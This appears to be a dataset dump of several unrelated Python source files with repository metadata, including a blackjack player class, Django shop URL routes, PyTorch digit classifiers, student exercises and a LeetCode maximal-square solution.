        """Period-10 rolling std matches the recorded fixture exactly."""
        period = 10
        std = standard_deviation.standard_deviation(self.data, period)
        np.testing.assert_array_equal(std, self.std_period_10_expected)

    def test_standard_deviation_invalid_period(self):
        """A period longer than the data raises with the documented message."""
        period = 128
        with self.assertRaises(Exception) as cm:
            standard_deviation.standard_deviation(self.data, period)
        expected = "Error: data_len < period"
        self.assertEqual(str(cm.exception), expected)
| [
"kyle@collectiveidea.com"
] | kyle@collectiveidea.com |
bd3b694a9266d7f863265fecde1124c15d651c67 | 7ef38efaf19daca871d7421fe3c7004065fd233c | /player.py | d86191a1dcdbde5fa45afd20876dd933de17266d | [] | no_license | T-Mahfouz/21Jack_python | 74b4dec8a8ee4fa4596177f1ea76a86caddb2dcc | 5083fe2f952f1b021520a3010493226397dcf3d0 | refs/heads/master | 2023-07-02T22:24:58.195838 | 2021-08-09T12:49:24 | 2021-08-09T12:49:24 | 394,289,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,486 | py | import random
from card import Card
import helper
class Player:
    """A blackjack-style (21) player holding a hand of cards."""

    def __init__(self, name):
        self.name = name
        self.cards = []            # the full hand
        self.aces_cards = []       # cache of aces; rebuilt by get_ace_cards()
        self.not_aces_cards = []   # kept for interface compatibility (unused here)
        self.total = 0
        self.initiate_cards()

    def initiate_cards(self):
        """Deal the opening two cards; the first one is the face-up card."""
        self.visible = self.get_random_card()
        self.cards.append(self.visible)
        self.cards.append(self.get_random_card())

    def get_random_card(self):
        """Draw a random Card from the deck definition in helper."""
        # NOTE(review): randrange(0, 12) yields indices 0..11; if
        # helper.get_cards_list() has 13 ranks (Ace..King) the last entry
        # can never be drawn -- confirm the intended range.
        rand = random.randrange(0, 12, 1)
        card = helper.get_cards_list()[rand]
        return Card(card['name'], card['value'])

    def pick_card(self):
        """Draw one more card into the hand (a "hit")."""
        card = self.get_random_card()
        self.cards.append(card)

    def get_ace_cards(self):
        """Return the aces currently in the hand.

        BUG FIX: the original appended to ``self.aces_cards`` on every
        call, so repeated calls (e.g. via get_total) accumulated duplicate
        aces.  The cache is now rebuilt from the hand each time.
        """
        self.aces_cards = [card for card in self.cards if card.name == 'Ace']
        return self.aces_cards

    def calculate_cards(self, cards):
        """Sum the face values of *cards* (aces counted as 1)."""
        return sum(card.value for card in cards)

    def get_total(self):
        """Return the best hand total, counting one ace as 11 when safe."""
        all_cards_total = self.calculate_cards(self.cards)
        ace_cards_total = self.calculate_cards(self.get_ace_cards())
        if ace_cards_total > 0 and all_cards_total <= 11:
            # Promote one ace from 1 to 11 (+10); <= 11 guarantees no bust.
            self.total = all_cards_total + 10
        else:
            self.total = all_cards_total
        return self.total
| [
"timahfouz262@gmail.com"
] | timahfouz262@gmail.com |
b0f53e1bd61093835a6df15d4df7565c7e99b41b | 5b3eb673f6597b90acc98b48852417982924c5d6 | /ecomsite/urls.py | 12cc0a632714c0c665d4cca61e0bb8cbf394c55b | [] | no_license | ritiksingh8/Buy-It-An-Ecommerce-WebApplication | 3e78d8ca35d167660bdbc5092ddabef41211335c | 6b9fd48e30660fd58ee0b6f3256fdab1b6a9b9a9 | refs/heads/master | 2020-12-01T18:13:46.229547 | 2020-02-16T12:34:15 | 2020-02-16T12:34:15 | 230,723,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | """ecomsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from shop import views as shop_views
from shop.views import ProductDetailView
from users import views as user_views
from django.contrib.auth import views as auth_views
# URL routes for the shop: storefront pages, auth views, and cart actions.
urlpatterns = [
    path('admin/', admin.site.urls),                                                                  # Django admin
    path('about/',shop_views.about,name='about'),                                                     # about page
    path('',shop_views.index,name='index'),                                                           # storefront home
    path('product/<int:pk>/',ProductDetailView.as_view(),name='product-detail'),                      # product detail by pk
    path('checkout/',shop_views.checkout,name='checkout'),                                            # checkout page
    path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),     # built-in login
    path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'), # built-in logout
    path('cart/<str:param1>/<str:param2>/', user_views.new_cart, name='cart'),                        # cart action; params' meaning defined in user_views.new_cart
    path('register',user_views.register,name='register')                                              # NOTE(review): no trailing slash, unlike the other routes -- confirm intended
]
| [
"ritik.singh@spit.ac.in"
] | ritik.singh@spit.ac.in |
3208b05d0da560dca27f9423abf4a82b2b8c2985 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/30/usersdata/82/9455/submittedfiles/atividade.py | c5d3ff8f09f278a98531a889412358d110818bae | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n=input('Digite o valor de n:')
i=1
j=n
soma=0
while i<=n:
soma=soma+i/j
i=i+1
j=j-1
print('%.5 f' %soma)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
9ccd664cded01d384a74b70078226710006213ac | cf7fed790b733b9a21ec6c65970e9346dba103f5 | /opencv/gen_sine_table.py | a92197731a8388aa38b098c9704de464791890c8 | [
"MIT"
] | permissive | CospanDesign/python | a582050993efc1e6267683e38dd4665952ec6d40 | a3d81971621d8deed2f1fc738dce0e6eec0db3a7 | refs/heads/master | 2022-06-20T15:01:26.210331 | 2022-05-29T01:13:04 | 2022-05-29T01:13:04 | 43,620,126 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,006 | py | #! /usr/bin/env python3
# Copyright (c) 2017 Dave McCoy (dave.mccoy@cospandesign.com)
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
    """Command-line entry point: write a half-degree sine lookup table.

    Computes sin(0.0 deg), sin(0.5 deg), ..., sin(89.5 deg) — 180 entries —
    and writes one value per line to sine_table_float.txt. The *argv*
    parameter is unused; argparse reads sys.argv directly.
    """
    # Command-line options (interface kept identical to the original).
    arg_parser = argparse.ArgumentParser(
        formatter_class=argparse.RawDescriptionHelpFormatter,
        description=DESCRIPTION,
        epilog=EPILOG
    )
    arg_parser.add_argument("-t", "--test",
                            nargs=1,
                            default=["something"])
    arg_parser.add_argument("-d", "--debug",
                            action="store_true",
                            help="Enable Debug Messages")
    opts = arg_parser.parse_args()

    print("Running Script: %s" % NAME)
    if opts.debug:
        print("test: %s" % str(opts.test[0]))

    # Build the table: half-degree steps covering [0, 90) degrees.
    sine_values = [np.sin(np.deg2rad(step / 2)) for step in range(0, 180)]

    with open("sine_table_float.txt", 'w') as out_file:
        for value in sine_values:
            out_file.write("%f\n" % value)
# Script entry point; main() never reads its argument — argparse parses
# sys.argv itself.
if __name__ == "__main__":
    main(sys.argv)
| [
"cospan@gmail.com"
] | cospan@gmail.com |
60e9881d0417bfd779ab8f261e6d4a6eba1be611 | f2ee087b896000ce500ecdb50d6af3a81c9ea67a | /ex16_read_write_file/ex16.py | 21af6acf9f67a01ada06dcad48bed4c2ac91e3b0 | [] | no_license | billgoo/Learn_Python_the_Hard_Way | 5a029223701f1fd6929afbe51b7cd3bfff3e7410 | a280b4110a10d41edda2e90c817f7a8fbc0cecd6 | refs/heads/master | 2020-05-04T17:39:42.275970 | 2019-08-14T14:28:35 | 2019-08-14T14:28:35 | 179,321,167 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,665 | py | """
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
"""
# Exercise 16 from "Learn Python the Hard Way": take a filename from the
# command line, erase the file, then rewrite it from three lines of input
# and echo the result back.
from sys import argv
script, filename = argv
# NOTE(review): the f-strings below contain the literal text "(unknown)"
# and no placeholder; the original exercise interpolates {filename} here —
# confirm against the upstream lesson before changing.
print(f"We're going to erase (unknown).")
print("If you don't want that, hit CTRL-C (^C).") # KeyboardInterrupt
print("If you do want that, hit RETURN.")
input("?")
print("Opening the file...")
target = open(filename, 'w') # open tries to be safe by making you explicitly say you want to write a file
print("Truncating the file. Goodbye!")
# no need truncate because 'w' mode will first do a truncate then do writing
target.truncate()
print("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print("I'm going to write these to the file.")
# The triple-quoted block below is a no-op string expression kept from the
# original lesson; the single write() after it is the study-drill version.
'''
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
'''
# study drill
target.write(f"{line1}\n{line2}\n{line3}\n")
print("And finally, we close it.")
target.close()
# Reopen in read mode to show the new contents to the user.
txt = open(filename)
print(f"Here's your file (unknown):")
print(txt.read())
txt.close() | [
"billgoo0813@gmail.com"
] | billgoo0813@gmail.com |
6568be9024a557f8279c8eca976ed88033d2a183 | 2c7220b474489ea9304c86e069298038a7234bb5 | /classifiers/classifiers.py | e0526676efac5abd81e571e64fe83fc6752ecd46 | [] | no_license | Nadavc220/Domain-Adversarial-Training-of-Neural-Networks-pytorch | 9b3c098439b85c914b9facfff02817aa615aef6b | 526a069cbf6c7b0105d1a68a1b0e0a2e7dce4906 | refs/heads/master | 2022-11-22T14:47:02.667859 | 2020-07-17T13:47:53 | 2020-07-17T13:47:53 | 280,435,514 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,746 | py | import torch
from torch import nn
import torch.nn.functional as F
class MnistClassifier(nn.Module):
"""
A classifier architecture for mnist data.
"""
def __init__(self):
super(MnistClassifier, self).__init__()
# Encoder
# self.conv1 = nn.Conv2d(in_channels=1, out_channels=10, kernel_size=5)
self.conv1 = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=5)
# self.conv2 = nn.Conv2d(in_channels=10, out_channels=20, kernel_size=5)
self.conv2 = nn.Conv2d(in_channels=32, out_channels=48, kernel_size=5)
self.dense1 = nn.Linear(768, 100)
self.dense2 = nn.Linear(100, 100)
self.dense3 = nn.Linear(100, 10)
self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
def forward(self, input):
x = self.encode(input)
x = torch.flatten(x, start_dim=1)
x = self.decode(x)
return x
def encode(self, input):
x = self.conv1(input)
x = F.relu(x)
x = self.max_pool(x)
x = self.conv2(x)
x = F.relu(x)
x = self.max_pool(x)
return x
def decode(self, input):
x = self.dense1(input)
x = F.relu(x)
x = self.dense2(x)
x = F.relu(x)
x = F.dropout(x, training=self.training)
x = self.dense3(x)
x = F.softmax(x, dim=1)
return x
class SvhnClassifier(nn.Module):
"""
A classifier architecture for mnist data.
"""
def __init__(self):
super(SvhnClassifier, self).__init__()
# Encoder
self.conv1 = nn.Conv2d(in_channels=3, out_channels=64, kernel_size=5)
self.conv2 = nn.Conv2d(in_channels=64, out_channels=64, kernel_size=5)
self.conv3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3)
# self.dense1 = nn.Linear(128, 3072)
self.dense1 = nn.Linear(512, 3072)
self.dense2 = nn.Linear(3072, 2048)
self.dense3 = nn.Linear(2048, 10)
self.relu = nn.ReLU()
self.max_pool = nn.MaxPool2d(kernel_size=3, stride=2)
def forward(self, input):
x = self.encode(input)
x = torch.flatten(x, start_dim=1)
x = self.decode(x)
return x
def encode(self, input):
x = self.conv1(input)
x = self.relu(x)
x = self.max_pool(x)
x = self.conv2(x)
x = self.relu(x)
x = self.max_pool(x)
x = self.conv3(x)
x = self.relu(x)
return x
def decode(self, input):
x = self.dense1(input)
x = self.relu(x)
x = self.dense2(x)
x = self.relu(x)
x = F.dropout(x, training=self.training)
x = self.dense3(x)
x = F.softmax(x, dim=1)
return x
| [
"nadavc220@gmail.com"
] | nadavc220@gmail.com |
ae8c313063f63d8ca46adb08c54ed25e9c15a211 | 6968c7f9d2b20b5296663829f99a27d184a59fc1 | /experiments/explorations/experiments/experiment_000202/repetition_000002/calc_statistics_per_repetition.py | 782a2e55a6ea5672f1258b531b384649ad3979d5 | [
"MIT"
] | permissive | flowersteam/automated_discovery_of_lenia_patterns | d42dff37323d51732571b33845c0562d844f498f | 97cc7cde2120fa95225d1e470e00b8aa8c034e97 | refs/heads/master | 2020-06-29T07:08:58.404541 | 2020-05-14T07:37:10 | 2020-05-14T07:37:10 | 200,470,902 | 13 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,282 | py | import exputils
import autodisc as ad
import os
import imageio
import numpy as np
import torch
import importlib
from torch.autograd import Variable
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, init='pca', random_state=0)
def collect_final_observation(explorer):
    """Encode the last observed state of each run as a PNG image.

    Returns a dict mapping '<run_id>.png' to PNG-encoded bytes; runs
    without observations are skipped.
    """
    images = dict()

    for run_data in explorer.data:
        observations = run_data.observations
        if observations is None or len(observations.states) == 0:
            continue

        # Scale [0, 1] state values to [0, 255] uint8 for a b/w PNG.
        frame = (observations.states[-1] * 255).astype(np.uint8)
        encoded = imageio.imwrite(
            imageio.RETURN_BYTES,
            frame,
            format='PNG-PIL')
        images['{:06d}.png'.format(run_data.id)] = encoded

    return images
def collect_observations(explorer):
    """Encode a fixed set of timesteps of each run as PNG images.

    Returns a dict mapping '<run_id>_<timestep>.png' to PNG-encoded
    bytes; runs without observations are skipped.
    """
    snapshot_steps = [0, 24, 49, 74, 99, 124, 149, 174, 199]
    images = dict()

    for run_data in explorer.data:
        observations = run_data.observations
        if observations is None or len(observations.states) == 0:
            continue
        for step in snapshot_steps:
            # Scale [0, 1] state values to [0, 255] uint8 for a b/w PNG.
            frame = (observations.states[step] * 255).astype(np.uint8)
            encoded = imageio.imwrite(
                imageio.RETURN_BYTES,
                frame,
                format='PNG-PIL')
            images['{:06d}_{:06d}.png'.format(run_data.id, step)] = encoded

    return images
def collect_representation(explorer):
    """Collect the goal-space coordinates of every run of an exploration.

    Returns a dict with the representation type ('HF', 'pretrainVAE' or
    'onlineVAE'), the number of runs, the goal-space dimensionality, a
    legend for the dimensions, the per-run goal-space coordinates and a
    2D t-SNE projection of those coordinates.
    """
    data = dict()
    data_representations = []
    n_runs = explorer.data.__len__()
    # Determine how the goal space was produced: a pytorch NN (VAE)
    # representation vs. hand-defined ('HF') statistics.
    if hasattr(explorer.config.goal_space_representation, 'type') and explorer.config.goal_space_representation.type == 'pytorchnnrepresentation':
        if type(explorer).__name__.lower() == 'goalspaceexplorer':
            explorer_type = 'pretrainVAE'
        elif type(explorer).__name__.lower() == 'onlinelearninggoalexplorer':
            explorer_type = 'onlineVAE'
        model = explorer.goal_space_representation.model
        n_dims_goal_space = model.n_latents
        representation_legend = ['dim {}'.format(dim) for dim in range(n_dims_goal_space)]
    else:
        explorer_type = 'HF'
        model = None
        representation_legend = explorer.config.goal_space_representation.config.statistics
        n_dims_goal_space = len(explorer.config.goal_space_representation.config.statistics)
    for run_data in explorer.data:
        if run_data.observations is not None and len(run_data.observations.states) > 0:
            # fixed representation stored in run_data.reached_goal
            if explorer_type == 'HF' or explorer_type == 'pretrainVAE': #
                data_representations.append(run_data.reached_goal)
            # online version: recompute the reached goal with last trained VAE
            elif explorer_type == 'onlineVAE':
                final_observation = run_data.observations.states[-1]
                input_img = Variable(torch.from_numpy(final_observation).unsqueeze(0).unsqueeze(0).float())
                outputs = model(input_img)
                # 'mu' is the VAE's latent mean, used as the goal-space point.
                representation = outputs['mu'].cpu().data.numpy().reshape(n_dims_goal_space)
                data_representations.append(representation)
    data['representation_type'] = explorer_type
    data['n_runs'] = n_runs
    data['n_dims_goal_space'] = n_dims_goal_space
    data['representation_legend'] = representation_legend
    data['coordinates_in_goal_space'] = data_representations
    # Project all goal-space points to 2D with the module-level t-SNE.
    data['coordinates_in_tsne_space'] = tsne.fit_transform(np.asarray(data_representations))
    return data
# def load_data(experiment_directory):
#
# dh = ad.ExplorationDataHandler.create(directory=os.path.join(experiment_directory, 'results'))
# dh.load(load_observations=False, verbose=True)
#
# dh.config.save_automatic = False
# dh.config.load_observations = True
# dh.config.memory_size_observations = 1
#
# return dh
def load_explorer(experiment_directory):
    """Load an explorer from *experiment_directory* and attach its config.

    Observations are not loaded up front; the data handler is configured
    to lazily load them one run at a time.
    """
    # load the full explorer without observations and add its config
    explorer = ad.explorers.GoalSpaceExplorer.load_explorer(os.path.join(experiment_directory, 'results'), run_ids=[], load_observations=False, verbose=False)
    explorer.data.config.load_observations = True
    explorer.data.config.memory_size_observations = 1

    # Import the experiment's experiment_config.py by file path (it lives
    # outside the package path) and take the explorer config it defines.
    spec = importlib.util.spec_from_file_location('experiment_config', os.path.join(experiment_directory, 'experiment_config.py'))
    experiment_config_module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(experiment_config_module)
    explorer.config = experiment_config_module.get_explorer_config()

    return explorer
if __name__ == '__main__':
    # Compute statistics for the repetition in the current directory.
    experiments = '.'

    # Each entry: (statistic name, collector function, optional 'zip'
    # flag telling exputils to store the result as an archive).
    statistics = [('final_observation', collect_final_observation, 'zip'),
                  ('observations', collect_observations, 'zip'),
                  ('representations', collect_representation),
                  ]

    exputils.calc_experiment_statistics(statistics, load_explorer, experiments, recalculate_statistics=False, verbose=True)
"chris.reinke@inria.fr"
] | chris.reinke@inria.fr |
667d3a55f26dcbea425733e4d22f03d40b58aea2 | 8f26514c451e2398d5e3688c184ea74d1dad21b2 | /month_01/test_01/test_02.py | 60b70e67643224bf76ad67e8d5c2bc33fc6e5eb3 | [] | no_license | CircularWorld/Python_exercise | 25e7aebe45b4d2ee4e3e3afded082c56483117de | 96d4d9c5c626f418803f44584c5350b7ce514368 | refs/heads/master | 2022-11-21T07:29:39.054971 | 2020-07-20T10:12:24 | 2020-07-20T10:12:24 | 281,081,559 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | '''
2.需求:在终端中获取月份和年份,打印相应的天数.
1 3 5 7 8 10 12 有 31天
2平年有28天,闰年有29天
4 6 9 11 有 30天
步骤:在终端中录入年份和月份,根据逻辑判断 ,显示天数
'''
# Read a month and a year from the terminal and print how many days that
# month has (prompts and output are in Chinese, kept exactly as written).
month = int(input('请输入月份:'))
year = int(input("请输入年份:"))
if month in range(1,13):
    if month in (4, 6, 9, 11):
        # April, June, September and November have 30 days.
        print(f"{year}年{month:02}月有30天")
    elif month == 2:
        # Gregorian leap-year rule: divisible by 4 and not by 100, or
        # divisible by 400 ('and' binds tighter than 'or', so this is correct).
        if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:
            print(f'{year}是闰年,二月有29天')
        else:
            print(f'{year}是平年,二月有28天')
    else:
        # Remaining months (1, 3, 5, 7, 8, 10, 12) have 31 days.
        print(f"{year}年{month:02}月有31天")
else:
    # Month outside 1..12: report invalid input.
    print("输入有误")
| [
"jiayuhaowork@163.com"
] | jiayuhaowork@163.com |
a68573ed34c3fc84071260193d2823ab1d84cc3a | 65a91bb1a2281b54ebef83c40a357e4e1cd4ffc8 | /221_Maximal_Square.py | ef9f9caf9ce43aa0718ce0d1efec9ef675922fbd | [] | no_license | mcao516/LeetCode_Practice | f1e3470bbbb3b13ed3dc04c7d259735a5d78741d | 2f4b74a406e4ae53523a0d958802d76be05f5c37 | refs/heads/main | 2023-04-21T02:16:17.884526 | 2021-05-23T03:14:02 | 2021-05-23T03:14:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 934 | py | class Solution:
def maximalSquare(self, matrix: List[List[str]]) -> int:
"""
F(i, j, l) = matrix(i, j) and F(i+1, j, l-1) and F(i, j+1, l-1) and F(i+1, j+1, l-1)
"""
m, n = len(matrix), len(matrix[0])
max_size = min(m, n)
F = [[[False] * max_size for _ in range(n)] for _ in range(m)] # [m, n, max_size]
max_length = 0
for l in range(max_size):
for row in range(m-l):
for col in range(n-l):
if l == 0:
F[row][col][l] = matrix[row][col] == "1"
else:
F[row][col][l] = F[row][col][0] and F[row+1][col][l-1] and F[row][col+1][l-1] and F[row+1][col+1][l-1]
if F[row][col][l] and (l + 1) > max_length:
max_length = l + 1
return max_length * max_length | [
"c_meng@outlook.com"
] | c_meng@outlook.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.